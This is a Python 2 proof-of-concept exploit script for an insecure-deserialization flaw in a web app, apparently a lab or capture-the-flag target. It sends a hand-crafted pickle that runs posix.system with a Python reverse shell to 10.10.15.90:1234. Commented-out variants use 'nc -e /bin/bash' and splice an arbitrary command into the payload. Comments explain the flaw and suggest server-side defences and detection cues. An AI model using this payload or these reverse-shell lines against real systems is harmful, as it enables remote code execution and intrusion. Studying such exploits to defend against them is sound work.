
import cPickle
import requests
from hashlib import md5


# Proof of concept for an insecure-deserialization flaw in a web app: the
# "character"/"quote" pair submitted to /submit appears to be stored and later
# unpickled when /check is asked for it by id (the /check call is kept below
# but commented out), so a crafted pickle string reaches pickle.loads() on the
# server.  The defence is on the server side: never unpickle data a client can
# influence -- use a non-executable format (e.g. json) or an Unpickler whose
# find_class() rejects everything but the expected types.
#
# NOTE(review): this is Python 2 code (print statements, cPickle) and will not
# run unmodified under Python 3.  cPickle is imported at file level but never
# used here; the response status is never checked before r.text is printed.
#
# Disabled interactive variant; the prompt text is Spanish for "Enter command: ".
#cmd = raw_input("Ingresa comando: ")


# Protocol-0 pickle, written by hand: GLOBAL posix.system, MARK, STRING <shell
# command>, TUPLE, REDUCE, STOP.  On load this evaluates
# posix.system("<command>") -- the textbook pickle.loads() hazard.  The inner
# quotes are pre-escaped (%27, %22) so they survive x-www-form-urlencoded
# parsing; the pickle's newlines are sent raw.
char = "cposix\nsystem\np0\n(S'echo homerp1;python -c %27import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.15.90%22,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27'\np1\ntp2\nRp3\n."

# Earlier/alternative payload strings, disabled; the last one would splice the
# interactive `cmd` above into the same pickle shape.
#char = "cposix\nsystem\np0\n(S'echo homerp1;nc 10.10.15.16 1234'\np1\ntp2\nRp3\n."
#char = "cposix\nsystem\np0\n(S'echo homerp1;nc -e /bin/bash 10.10.15.16 1234'\np1\ntp2\nRp3\n."
#char = "cposix\nsystem\np0\n(S'echo homerp1;"+cmd+" > /tmp/SK11'\np1\ntp2\nRp3\n."

# Second form field; sent as a single space so it contributes nothing visible.
quote = " "

# md5 of character+quote: presumably mirrors how the app derives the record id
# that /check takes -- TODO confirm against the application source.
mdh = md5(char + quote).hexdigest()
print("hash -> "+mdh)
print ""
# Form body is built by hand rather than passed as a dict; requests sends a str
# body verbatim, so no further encoding is applied to `char` or `quote`.
dataPOST = "character="+char + "&quote="+quote

# Step 1: store the record via /submit (live target first, local test
# instance of the same app second).
r = requests.post("http://10.10.10.70/submit", data = dataPOST, headers={"Content-Type": "application/x-www-form-urlencoded"})
#r = requests.post("http://127.0.0.1:5000/submit", data = dataPOST, headers={"Content-Type": "application/x-www-form-urlencoded"})
 
# Step 2 (disabled): request the stored record by id; this is the point at
# which the server would deserialize it.  From the defender's side the tell is
# the web worker spawning a shell (posix.system) and an outbound connection
# from the app host to a non-service port -- both worth alerting on.
#sending the payload
#r = requests.post("http://10.10.10.70/check", data = "id="+mdh, headers={"Content-Type": "application/x-www-form-urlencoded"})
#r = requests.post("http://127.0.0.1:5000/check", data = "id="+mdh, headers={"Content-Type": "application/x-www-form-urlencoded"})
print r.text

# Same /check request with a fixed id instead of the computed hash, disabled.
#sending the payload
#r = requests.post("http://127.0.0.1:5000/check", data = "id=SK11", headers={"Content-Type": "application/x-www-form-urlencoded"})
#r = requests.post("http://10.10.10.70/check", data = "id=SK11", headers={"Content-Type": "application/x-www-form-urlencoded"})
#print r.text